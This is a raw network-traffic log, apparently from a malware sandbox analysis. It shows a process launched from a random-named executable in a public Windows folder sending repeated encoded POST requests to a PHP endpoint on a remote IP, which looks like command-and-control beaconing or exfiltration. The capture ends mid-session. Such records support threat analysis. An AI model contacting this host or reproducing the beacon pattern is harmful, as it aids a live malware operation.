                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:00.890161037 CEST2552OUTData Raw: 5c 5f 46 5b 5f 5c 55 5b 54 57 5b 54 52 57 57 5c 58 54 58 58 5b 59 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \_F[_\U[TW[TRWW\XTXX[YUV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.'[);1=$?"#Z;3>V#+"-==2 9"_$,P,
                                                                                                Oct 11, 2024 20:38:03.889027119 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:04.036119938 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                15192.168.2.5499955.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:03.976974964 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:04.329658985 CEST2140OUTData Raw: 59 5d 43 50 5a 5a 55 5b 54 57 5b 54 52 5e 57 55 58 53 58 54 5b 5d 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]CPZZU[TW[TR^WUXSXT[]UY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-04X)=3"]6X/U+(82#+2:!)W$Z9;"_$,P,'
                                                                                                Oct 11, 2024 20:38:04.671448946 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:04.813133001 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5b 21 3c 28 01 29 1d 3d 55 38 3a 0c 0d 24 32 03 00 25 38 2f 17 21 14 3c 58 39 2d 27 50 26 39 3f 11 2a 02 07 0d 24 2f 37 1d 30 3b 2b 5d 0d 10 26 5d 24 30 2e 1c 3d 01 3c 54 2e 2d 39 07 27 2e 22 5a 21 2d 2f 52 21 58 3a 06 31 3c 01 0e 27 2d 3d 51 3f 1a 31 11 2f 2f 2c 00 25 3e 2f 55 0f 11 38 54 31 01 12 5e 21 2d 38 0a 20 01 01 06 34 2f 22 5b 20 0d 0a 02 25 29 2f 12 25 02 39 02 2a 33 0d 54 28 31 35 14 25 5c 3a 0f 2a 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989[!<()=U8:$2%8/!<X9-'P&9?*$/70;+]&]$0.=<T.-9'."Z!-/R!X:1<'-=Q?1//,%>/U8T1^!-8 4/"[ %)/%9*3T(15%\:*""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                16192.168.2.5500015.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:04.443034887 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:04.796629906 CEST2552OUTData Raw: 59 5d 46 58 5a 5a 55 58 54 57 5b 54 52 56 57 5d 58 52 58 54 5b 5d 55 5f 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]FXZZUXTW[TRVW]XRXT[]U__[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D$=8.P?& [3?)! .#+*;=Q#(*:6?1$X-"_$,P,
                                                                                                Oct 11, 2024 20:38:05.169455051 CEST225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 31 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 38 3a 30 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Oct 2024 18:38:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                17192.168.2.5500025.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:05.838279963 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:06.188448906 CEST2156OUTData Raw: 59 5f 46 58 5f 5d 50 5a 54 57 5b 54 52 5c 57 50 58 5f 58 59 5b 5b 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_FX_]PZTW[TR\WPX_XY[[UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.'*#?;>U=5''<:"+, (Z)( 8..)^*! ]9;"_$,P,+
                                                                                                Oct 11, 2024 20:38:06.560077906 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:06.695538044 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 13 23 2f 0d 5f 29 1d 2a 08 3b 3a 2a 08 31 21 22 1a 25 38 33 5e 21 04 15 02 2d 3d 3c 0e 25 3a 0a 04 3e 3c 25 0f 33 11 34 00 24 11 2b 5d 0d 10 26 5e 24 1d 08 12 3d 06 2c 1c 2d 3e 35 06 33 3e 36 16 22 10 3b 1b 22 58 35 5c 32 3c 3b 0b 27 3e 26 0d 29 27 39 10 2d 3f 33 5f 24 3e 2f 55 0f 11 38 1f 26 59 3f 01 23 3e 27 11 22 3f 0a 15 37 3c 2d 00 34 33 05 1f 26 14 3f 59 25 12 22 12 29 0d 23 55 2a 0c 3d 15 32 29 29 12 28 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#/_)*;:*1!"%83^!-=<%:><%34$+]&^$=,->53>6";"X5\2<;'>&)'9-?3_$>/U8&Y?#>'"?7<-43&?Y%")#U*=2))(2"S."S2WM0
                                                                                                Oct 11, 2024 20:38:06.912292957 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 13 23 2f 0d 5f 29 1d 2a 08 3b 3a 2a 08 31 21 22 1a 25 38 33 5e 21 04 15 02 2d 3d 3c 0e 25 3a 0a 04 3e 3c 25 0f 33 11 34 00 24 11 2b 5d 0d 10 26 5e 24 1d 08 12 3d 06 2c 1c 2d 3e 35 06 33 3e 36 16 22 10 3b 1b 22 58 35 5c 32 3c 3b 0b 27 3e 26 0d 29 27 39 10 2d 3f 33 5f 24 3e 2f 55 0f 11 38 1f 26 59 3f 01 23 3e 27 11 22 3f 0a 15 37 3c 2d 00 34 33 05 1f 26 14 3f 59 25 12 22 12 29 0d 23 55 2a 0c 3d 15 32 29 29 12 28 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#/_)*;:*1!"%83^!-=<%:><%34$+]&^$=,->53>6";"X5\2<;'>&)'9-?3_$>/U8&Y?#>'"?7<-43&?Y%")#U*=2))(2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                18192.168.2.5500035.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:08.295085907 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:08.654562950 CEST2544OUTData Raw: 5c 59 43 5a 5f 52 55 5a 54 57 5b 54 52 5e 57 54 58 53 58 5a 5b 59 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YCZ_RUZTW[TR^WTXSXZ[YU]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$7>81)5$^'!66 ;#');24+>:Y>2#."_$,P,7
                                                                                                Oct 11, 2024 20:38:09.007503033 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:09.138165951 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                19192.168.2.5500045.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:08.308618069 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:08.654586077 CEST2156OUTData Raw: 59 53 46 5b 5f 5d 55 54 54 57 5b 54 52 58 57 5c 58 5f 58 58 5b 5f 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSF[_]UTTW[TRXW\X_XX[_U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-09/=U>^39!+Z, <*8*#>9>9>X."_$,P,;
                                                                                                Oct 11, 2024 20:38:12.023457050 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:12.478418112 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 11 22 2c 37 14 2a 33 2a 08 38 39 2e 0c 26 1c 00 14 31 16 33 5c 21 04 20 5b 2e 10 0d 1c 24 3a 01 5b 3d 02 08 55 27 06 3f 10 30 01 2b 5d 0d 10 25 07 26 30 2e 5f 2a 2b 3b 08 2d 2e 08 5b 27 2e 2e 5c 36 3d 3c 0d 35 3d 29 5b 32 02 20 56 31 3d 21 1f 2b 0a 00 05 2d 2c 27 1b 32 04 2f 55 0f 11 38 53 25 11 12 59 36 2e 2f 1f 20 2f 2c 5f 20 2c 21 01 23 1d 34 04 25 5c 3f 5d 31 02 31 07 28 33 0d 56 3e 31 29 5e 25 14 21 54 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989",7*3*89.&13\! [.$:[=U'?0+]%&0._*+;-.['..\6=<5=)[2 V1=!+-,'2/U8S%Y6./ /,_ ,!#4%\?]11(3V>1)^%!T("S."S2WM0
                                                                                                Oct 11, 2024 20:38:12.478507996 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 11 22 2c 37 14 2a 33 2a 08 38 39 2e 0c 26 1c 00 14 31 16 33 5c 21 04 20 5b 2e 10 0d 1c 24 3a 01 5b 3d 02 08 55 27 06 3f 10 30 01 2b 5d 0d 10 25 07 26 30 2e 5f 2a 2b 3b 08 2d 2e 08 5b 27 2e 2e 5c 36 3d 3c 0d 35 3d 29 5b 32 02 20 56 31 3d 21 1f 2b 0a 00 05 2d 2c 27 1b 32 04 2f 55 0f 11 38 53 25 11 12 59 36 2e 2f 1f 20 2f 2c 5f 20 2c 21 01 23 1d 34 04 25 5c 3f 5d 31 02 31 07 28 33 0d 56 3e 31 29 5e 25 14 21 54 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989",7*3*89.&13\! [.$:[=U'?0+]%&0._*+;-.['..\6=<5=)[2 V1=!+-,'2/U8S%Y6./ /,_ ,!#4%\?]11(3V>1)^%!T("S."S2WM0
                                                                                                Oct 11, 2024 20:38:12.479088068 CEST374INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 31 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 38 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 12 39 11 22 2c 37 14 2a 33 2a 08 38 39 2e 0c 26 1c 00 14 31 16 33 5c 21 04 20 5b 2e 10 0d 1c 24 3a 01 5b 3d 02 08 55 27 06 3f 10 30 01 2b 5d 0d 10 25 07 26 30 2e 5f 2a 2b 3b 08 2d 2e 08 5b 27 2e 2e 5c 36 3d 3c 0d 35 3d 29 5b 32 02 20 56 31 3d 21 1f 2b 0a 00 05 2d 2c 27 1b 32 04 2f 55 0f 11 38 53 25 11 12 59 36 2e 2f 1f 20 2f 2c 5f 20 2c 21 01 23 1d 34 04 25 5c 3f 5d 31 02 31 07 28 33 0d 56 3e 31 29 5e 25 14 21 54 28 08 22 53 2e 00 22 53 [TRUNCATED]
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Oct 2024 18:38:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding989",7*3*89.&13\! [.$:[=U'?0+]%&0._*+;-.['..\6=<5=)[2 V1=!+-,'2/U8S%Y6./ /,_ ,!#4%\?]11(3V>1)^%!T("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                20192.168.2.5500055.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:09.272782087 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:09.623225927 CEST2552OUTData Raw: 59 5a 43 5d 5f 5f 50 5f 54 57 5b 54 52 59 57 52 58 53 58 55 5b 59 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YZC]__P_TW[TRYWRXSXU[YU^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-0)#?89=P$Y'<*5;.08[)785S->=! Z/+"_$,P,
                                                                                                Oct 11, 2024 20:38:09.964113951 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:10.093425035 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                21192.168.2.5500065.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:11.869066000 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:12.224672079 CEST2552OUTData Raw: 59 52 43 50 5f 5e 55 59 54 57 5b 54 52 5a 57 53 58 53 58 5d 5b 5d 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRCP_^UYTW[TRZWSXSX][]UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.@$0)8"=&[36"'Y8$Z*789-*?"8:"_$,P,3
                                                                                                Oct 11, 2024 20:38:12.559078932 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:12.820523024 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                22192.168.2.5500075.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:12.958575010 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:13.310591936 CEST2552OUTData Raw: 5c 58 43 58 5f 5b 55 5b 54 57 5b 54 52 5b 57 5d 58 54 58 54 5b 55 55 5f 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XCX_[U[TW[TR[W]XTXT[UU__[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.%9,*>?&/0<16&?]/$Y((%W (-W:!?" ."_$,P,7
                                                                                                Oct 11, 2024 20:38:13.660278082 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:13.790978909 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.2.5500085.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:13.489424944 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
